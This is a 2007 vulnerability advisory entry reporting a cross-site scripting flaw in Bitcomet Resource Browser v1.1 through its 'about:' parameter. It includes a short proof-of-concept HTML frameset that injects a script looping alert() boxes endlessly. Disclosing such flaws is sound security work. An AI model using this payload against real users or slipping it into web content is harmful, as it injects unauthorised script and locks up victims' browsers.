Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18491
HistoryNov 25, 2007 - 12:00 a.m.

Bitcomet Resource Browser v1.1 XSS

2007-11-2500:00:00
vulners.com
47

The program is vulnerable to attacks of the kind xss the parameter "about:" scripts without authorization in the example that I am presenting is a page that runs a while with a msgbox infinity.

Create an html file and paste the following code

<html>

<frameset rows="100%">

<frame src="about:<script>while(1)alert("Juan Pablo Lopez Yacubian")</script>">

</frameset>

</html>